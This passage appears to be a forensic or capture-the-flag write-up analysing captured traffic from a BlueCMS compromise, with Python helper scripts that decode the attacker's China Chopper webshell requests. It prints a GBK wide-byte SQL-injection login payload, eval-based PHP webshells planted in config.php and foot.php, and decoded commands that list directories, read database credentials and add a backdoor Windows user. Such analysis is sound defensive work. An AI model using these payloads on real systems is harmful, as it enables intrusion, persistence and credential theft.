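            t["closed"] = True
    return tunnels


def ports_by_target(tunnels):
    """Map each target host to the sorted list of ports connected to."""
    out = {}
    for t in tunnels.values():
        if t["target"]:
            out.setdefault(t["target"], set()).add(t["port"])
    return {host: sorted(ports) for host, ports in out.items()}


def scanned_range(tunnels):
    """Lowest and highest target address, i.e. the range asked for in question 1."""
    addrs = sorted({ipaddress.ip_address(t["target"]) for t in tunnels.values() if t["target"]})
    return (str(addrs[0]), str(addrs[-1])) if addrs else None


if __name__ == "__main__":
    tunnels = reconstruct_tunnels(SAMPLE_REQUESTS)
    for sid, t in tunnels.items():
        print(sid, t)
    print("ports per host:", ports_by_target(tunnels))
    print("scanned range:", scanned_range(tunnels))
```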


The login happened here.


admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// A wide-byte (GBK) SQL injection was used here to log in directly

Then the template editor /admin/tpl_manage.php was used to edit ../data/config.php


At this point the attacker has created the webshell; next let's analyze how the attacker used it.

grep -o 'Bshell.*' http.txt > Bshell
import base64
from urllib.parse import unquote

# each line of "Bshell" is one URL-encoded Bshell POST body from the grep above
with open("Bshell") as f:
    for line in f:
        print("-" * 32)
        data = "Bshell=@eval(ba" + unquote(line)[16:-1]
        print(data)
        # every parameter after the password (z0, z1, ...) is base64-encoded
        for param in data.split("&")[1:]:
            key, _, value = param.partition("=")
            # restore any '=' padding that was stripped, then decode
            padded = value + "=" * (-len(value) % 4)
            try:
                decoded = base64.b64decode(padded, validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = value  # not base64 at all (e.g. a literal path)
            print("%s=%s" % (key, decoded))
Bshell=@eval(base64_decode($_POST[z0]));&z0=[base64 elided]
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// Get the target server's system information and username
->|C:/phpstudy/WWW/bluecms/data C:D:    Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[base64 elided]&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// List all files in C:\\ on the target server
addons/  2017-08-29 03:38:21 0   0777
Documents and Settings/ 2017-09-06 03:58:45 0   0777
phpstudy/   2017-09-06 03:39:12 0   0777
Program Files/  2017-09-06 03:53:46 0   0555
RECYCLER/   2017-08-29 03:37:07 0   0777
System Volume Information/  2017-07-24 03:56:23 0   0777
WINDOWS/    2017-08-28 06:55:01 0   0777
AUTOEXEC.BAT    2017-07-24 03:54:32 0   0777
boot.ini    2017-07-24 03:52:40 211 0666
bootfont.bin    2008-04-14 12:00:00 322730  0444
CONFIG.SYS  2017-07-24 03:54:32 0   0666
IO.SYS  2017-07-24 03:54:32 0   0444
MSDOS.SYS   2017-07-24 03:54:32 0   0444
NTDETECT.COM    2008-04-14 12:00:00 47564   0555
ntldr   2008-04-14 12:00:00 257728  0444
pagefile.sys    2017-09-07 11:47:21 805306368   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[base64 elided]&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// List all files in C:\\ on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// Run the system command net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// Run the system command net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[base64 elided]&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List all files in C:\\phpstu on the target server
->|./   2017-09-07 08:26:56 0   0777       
../ 2017-09-06 03:39:12 0   0777           
bluecms/    2017-09-07 08:27:01 0   0777   
metinfo/    2017-09-07 07:05:58 0   0777   
phpMyAdmin/ 2017-09-06 03:38:48 0   0777   
l.php   2014-02-27 15:02:21 21201   0666   
phpinfo.php 2013-05-09 12:56:36 23  0666   
|<-                                        


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[base64 elided]&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List all files in C:\\phpstu on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// List all files in C:\\phpstudy\\WWW\\ on the target server
->|./   2017-09-07 08:27:01 0   0777                   
../ 2017-09-07 08:26:56 0   0777
admin/  2017-09-07 08:27:02 0   0777
api/    2017-09-07 08:27:01 0   0777
data/   2017-09-07 08:33:05 0   0777
images/ 2017-09-07 08:27:01 0   0777
include/    2017-09-07 08:26:59 0   0777
install/    2017-09-07 08:26:57 0   0777
js/ 2017-09-07 08:26:57 0   0777
templates/  2017-09-07 08:26:56 0   0777
uc_client/  2017-09-07 08:26:56 0   0777
ad_js.php   2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478    0666
category.php    2010-02-08 13:47:48 8821    0666
comment.php 2010-02-08 13:39:40 3531    0666
guest_book.php  2010-02-08 13:51:28 2538    0666
index.php   2010-02-08 13:40:08 7471    0666
info.php    2010-02-08 13:50:02 4527    0666
info_index.php  2010-02-08 13:50:50 1869    0666
news.php    2010-01-07 10:02:34 3477    0666
news_cat.php    2010-02-08 13:54:52 2069    0666
publish.php 2010-02-09 03:40:36 9185    0666
robots.txt  2009-12-01


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=...&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// List every file in the C:\\phpstudy\\WWW\\bluecms\\ directory on the target server
->|./   2017-09-07 08:33:05 0   0777
../ 2017-09-07 08:27:01 0   0777
admin/  2017-09-07 08:27:01 0   0777
backup/ 2017-09-07 08:27:01 0   0777
cache/  2017-09-07 08:27:01 0   0777
compile/    2017-09-08 02:30:03 0   0777
upload/ 2017-09-07 08:27:01 0   0777
bannedip.cache.php  2017-09-08 09:24:52 25  0666
config.cache.php    2017-09-07 08:33:05 550 0666
config.php  2017-09-08 09:27:58 276 0666
index.htm   2009-10-02 12:46:24 894 0666
update_log.txt  2017-09-07 08:42:58 8   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=...&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List every file in the C:\\phpstu directory on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// Read the contents of C:\\phpstudy\\WWW\\bluecms\\data\\config.php
->|<?php
$dbhost   = "localhost";
$dbname   = "bluecms";
$dbuser   = "root";
$dbpass   = "123456";
$pre    = "blue_";
$cookiedomain = '';
$cookiepath = '/';
@eval($_POST['Bshell']);
define('BLUE_CHARSET','gb2312');
define('BLUE_VERSION','v1.6');
?>|<-

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// Write <?php eval($_POST['cmd_shell']);?> into C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// Write <?php eval($_POST['cmd_shell']);?> into C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=...&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// List every file in the C:\\phpstudy\\WWW\\bluecms\\data\\ directory on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// Read the contents of C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
->|<?php eval($_POST['cmd_shell']);?>|<

Another way in is to search for the delimiter Caidao (菜刀) uses to separate its own command output from the HTML the application itself emits, for example: ->|

At this point the analysis is essentially complete.
